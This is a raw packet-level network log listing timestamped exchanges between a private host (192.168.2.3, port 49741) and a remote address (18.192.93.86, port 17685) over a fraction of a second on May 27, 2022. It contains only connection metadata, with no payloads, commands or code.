May 27, 2022 19:28:20.016860962 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.016865015 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.016906023 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.016916037 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.016946077 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.016964912 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.016985893 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.016995907 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.017045975 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.017075062 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.017115116 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.017132044 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.017155886 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.017178059 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.017198086 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.017213106 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.017237902 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.017256975 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.017302036 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.017303944 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.017363071 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.017414093 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.017430067 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.017472982 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.017483950 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.017504930 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.017523050 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.017539024 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.017579079 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.017596006 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.017597914 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.017641068 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.017659903 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.017710924 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.017725945 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.017766953 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.017786980 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.017833948 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.017877102 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.017889023 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.017916918 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.017940998 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.017961025 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.017971039 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.017976999 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.018019915 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.018037081 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.033343077 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.033524036 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.033543110 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.033559084 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.033576965 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.033830881 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.033864975 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.033906937 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.033924103 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.033938885 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.034188986 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.034229994 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.034245968 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.034310102 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.034327030 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.034343004 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.034360886 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.034377098 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.034393072 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.034409046 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.034425020 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.035042048 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.035062075 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.035078049 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.035188913 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.035207033 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.035232067 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.035248995 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.035267115 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.035283089 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.035300016 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.035315990 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.035331964 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.035347939 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.035365105 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.035794973 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.035813093 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.035830021 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.035865068 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.035909891 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.035926104 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.035942078 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.035958052 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.035988092 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.036027908 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.036046028 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.036072016 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.036088943 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.036106110 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.036113024 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.036147118 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.036165953 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.036170006 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.036181927 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.036189079 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.036206961 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.036228895 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.036658049 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.036680937 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.036696911 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.036705971 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.036715984 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.036732912 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.036741018 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.036748886 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.036766052 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.036767006 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.036788940 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.036811113 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.036820889 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.036828041 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.036844969 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.036848068 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.036876917 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.036894083 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.036967039 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.036983967 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.036998987 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.037000895 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.037012100 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.037014961 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.037030935 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.037038088 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.037045956 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.037061930 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.037064075 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.037077904 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.037090063 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.037112951 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.037121058 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.037148952 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.037158966 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.037439108 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.037462950 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.037491083 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.037506104 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.037519932 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.037523031 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.037538052 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.037549019 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.037554979 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.037564993 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.037587881 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.037596941 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.037604094 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.037611961 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.037627935 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.037638903 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.037643909 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.037658930 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.037658930 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.037683010 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.037723064 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.037725925 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.037754059 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.037767887 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.037806034 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.037816048 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.037832022 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.037847996 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.037859917 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.037864923 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.037880898 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.037880898 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.037897110 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.037913084 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.037918091 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.037930965 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.037991047 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.038304090 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.038306952 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.038347006 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.038388014 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.038403988 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.038424969 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.038439989 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.038466930 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.038499117 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.038528919 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.038533926 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.038548946 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.038566113 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.038583040 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.038584948 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.038598061 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.038598061 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.038614035 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.038628101 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.038630009 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.038644075 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.038645983 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.038664103 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.038680077 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.038686037 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.038695097 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.038707018 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.038712025 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.038727999 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.038741112 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.038743973 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.038758039 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.038759947 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.038777113 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.038779974 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.038791895 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.038791895 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.038806915 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.038810015 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.038822889 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.038839102 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.038841009 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.038855076 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.038868904 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.038872004 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.038882017 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.038888931 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.038904905 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.038912058 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.038922071 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.038928032 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.038938999 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.038940907 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.039004087 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.039051056 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.039153099 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.039191008 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.039410114 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.039426088 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.039441109 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.039450884 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.039458036 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.039474964 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.039501905 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.039519072 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.039524078 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.039562941 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.039578915 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.039587021 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.039593935 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.039611101 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.039614916 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.039624929 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.039642096 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.039645910 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.039658070 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.039659023 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.039673090 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.039688110 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.039704084 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.039729118 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.039758921 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.039809942 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.039865017 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.039895058 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.039904118 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.039949894 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.055079937 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.055102110 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.055166960 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.055170059 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.055202007 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.055262089 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.055409908 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.055427074 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.055459976 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.055473089 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.055505037 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.055514097 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.055521965 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.055529118 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.055558920 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.055588961 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.055679083 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.055694103 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.055730104 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.055752039 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.055777073 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.055792093 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.055807114 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.055852890 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.055874109 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.055913925 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.055928946 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.055954933 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.055993080 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.056009054 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.056160927 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.056278944 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.056312084 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.056607008 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.056624889 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.056655884 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.056713104 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.056752920 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.056797028 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.056823015 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.056932926 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.056948900 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.056965113 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.056982040 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.056997061 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.057074070 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.057113886 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.057570934 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.057591915 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.057636023 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.057651997 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.057666063 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.057753086 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.057794094 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.057919979 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.057951927 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.057992935 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.058008909 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.058024883 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.058041096 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.058073044 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.058115959 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.058131933 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.058149099 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.058193922 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.058274031 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.058315039 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.058398962 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.058413982 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.058429956 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.058445930 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.058461905 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.058516979 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.058593988 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.058634996 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.058651924 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.058669090 CEST	17685	49741	18.192.93.86	192.168.2.3
